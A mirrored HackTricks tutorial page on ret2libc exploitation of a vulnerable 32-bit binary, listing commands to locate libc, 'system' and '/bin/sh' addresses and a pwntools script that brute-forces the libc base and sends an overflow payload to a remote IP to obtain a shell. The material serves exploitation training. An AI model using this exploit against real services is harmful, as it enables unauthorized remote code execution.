mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 20:53:37 +00:00
111 lines
4.9 KiB
Markdown
111 lines
4.9 KiB
Markdown
|
|
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
|
|
|
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
|
|
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|
|
|
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
|
|
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
|
|
</details>
|
|
|
|
|
|
**If you have found a vulnerable binary and you think that you can exploit it using Ret2Lib here you can find some basic steps that you can follow.**
|
|
|
|
# If you are **inside** the **host**
|
|
|
|
## You can find the **address of lib**c
|
|
|
|
```bash
|
|
ldd /path/to/executable | grep libc.so.6 #Address (if ASLR, then this change every time)
|
|
```
|
|
|
|
If you want to check if the ASLR is changing the address of libc you can do:
|
|
|
|
```bash
|
|
for i in `seq 0 20`; do ldd <Ejecutable> | grep libc; done
|
|
```
|
|
|
|
## Get offset of system function
|
|
|
|
```bash
|
|
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
|
|
```
|
|
|
|
## Get offset of "/bin/sh"
|
|
|
|
```bash
|
|
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
|
|
```
|
|
|
|
## /proc/\<PID>/maps
|
|
|
|
If the process is creating **children** every time you talk with it (network server) try to **read** that file (probably you will need to be root).
|
|
|
|
Here you can find **exactly where is the libc loaded** inside the process and **where is going to be loaded** for every children of the process.
|
|
|
|
![](<../../.gitbook/assets/image (95).png>)
|
|
|
|
In this case it is loaded in **0xb75dc000** (This will be the base address of libc)
|
|
|
|
## Using gdb-peda
|
|
|
|
Get address of **system** function, of **exit** function and of the string **"/bin/sh"** using gdb-peda:
|
|
|
|
```
|
|
p system
|
|
p exit
|
|
find "/bin/sh"
|
|
```
|
|
|
|
# Bypassing ASLR
|
|
|
|
You can try to bruteforce the abse address of libc.
|
|
|
|
```python
|
|
for off in range(0xb7000000, 0xb8000000, 0x1000):
|
|
```
|
|
|
|
# Code
|
|
|
|
```python
|
|
from pwn import *
|
|
|
|
c = remote('192.168.85.181',20002)
|
|
c.recvline() #Banner
|
|
|
|
for off in range(0xb7000000, 0xb8000000, 0x1000):
|
|
p = ""
|
|
p += p32(off + 0x0003cb20) #system
|
|
p += "CCCC" #GARBAGE
|
|
p += p32(off + 0x001388da) #/bin/sh
|
|
payload = 'A'*0x20010 + p
|
|
c.send(payload)
|
|
c.interactive() #?
|
|
```
|
|
|
|
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
|
|
|
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
|
|
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|
|
|
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
|
|
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
|
|
</details>
|
|
|
|
|